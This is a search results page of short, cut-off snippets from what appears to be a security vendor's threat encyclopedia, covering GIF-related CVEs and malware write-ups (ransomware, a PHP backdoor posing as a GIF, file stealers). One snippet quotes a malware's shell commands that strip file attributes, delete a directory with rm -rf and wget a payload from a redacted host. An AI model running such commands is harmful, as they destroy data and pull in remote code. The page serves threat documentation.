Keyword: gif
2903 Total Search   |   Showing Results : 1 - 20
   Next  
SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and
CVE-2008-3230 The ffmpeg lavf demuxer allows user-assisted attackers to cause a denial of service (application crash) via a crafted GIF file, possibly related to gstreamer, as demonstrated by
CVE-2008-1373 Buffer overflow in the gif_read_lzw function in CUPS 1.3.6 allows remote attackers to have an unknown impact via a GIF file with a large code_size value, a similar issue to
via (1) a crafted PNG image that triggers an integer overflow during memory allocation for display on the splash screen, aka CR 6804996; and (2) a crafted GIF image from which unspecified values are
allows remote attackers to access files or execute arbitrary code via a crafted GIF image, aka CR 6804998. sun jdk 1.4.0,sun jdk 1.4.0_01,sun jdk 1.4.0_02,sun jdk 1.4.0_03,sun jdk 1.4.0_04,sun jdk
privileges via a GIF image with a block with a 0 width field, which triggers memory corruption. Sun JDK 5.0 Update3,Sun JDK 5.0 Update4,Sun JDK 5.0 Update5,Sun JDK 5.0 Update7,Sun JDK 5.0 Update8,Sun JDK 5.0
dereference and application crash) via an animated GIF file with a large image size, a different vulnerability than CVE-2009-3373. mozilla firefox 0.1,mozilla firefox 0.10,mozilla firefox 0.10.1,mozilla firefox
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Other Details Based on analysis of the codes, it has the following capabilities: This is a GIF
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. NOTES: This is the Trend Micro detection for image files (Bitmap, GIF and JPEG) embedded with an
{variable1} where {variable1} can be any of the following: html htm jpeg png jpg gif js a variant of SWF/Exploit.Agent.HQ (ESET), Script.SWF.C362 (F-Secure)
following processes: md5sum gif|grep c40f853e641b91565ecc92fe1affd78e|grep -v grep |wc -l chattr -ia -R /var/lib/gif > /dev/null 2>&1 /bin/rm -rf /var/lib/gif wget -c http://y.{BLOCKED}l.com/gif -O
subdirectories with the following file extensions: bat bmp doc docm docx gif html jpeg jpg mp3 mp4 pdf png ppt pptm pptx psd rar rtf txt vbs wav xls xlsm xlsx zip Ransom.YeeScrLocker(Norton);MSIL/LockScreen.RC!tr
Upload File Execute Commands NOTES: This backdoor disguises itself as a GIF but actually contains a PHP script. This is installed in a compromised web server by a malicious user. This backdoor would
Web Start Splashscreen GIF Decoding Buffer Overflow
wav wma 3gp 3g2 avi flv m4v mov mp4 mpg vob wmv 3dm 3ds max obj blend bmp gif png jpeg jpg psd tif gif ico ai eps ps svg pdf indd pct epub xls xlr xlsx accdb sqlite dbf mdb pdb sql db dem gam nes rom
following files: /client_id.txt Ransomware Routine This Ransomware encrypts files with the following extensions: db csv sql xml cer cgi htm html xhtml css js php dat log gif jpg jpeg png svg tif tiff raw ps
capablities: can steal files with the following file extensions: dll exe jar jpg jpeg png bmp gif ico html htm xml php cpp c h docx txt 7z rar zip others - specified by the user steal in the following
%Program Files%\DVDVideoSoft\Free Audio Converter\sv-SE %Program Files%\DVDVideoSoft\Free Audio Converter\Themes\GreenHills %Program Files%\DVDVideoSoft\Free GIF Maker\iconengines %Program Files%
" Other Details This Trojan encrypts files with the following extensions: bmp doc gif htm html jpg lnk mdb pdf png ppt txt xls zip TrojanDownloader:Win32/Abgade.A (Microsoft), SpywareGuard2008 (Symantec),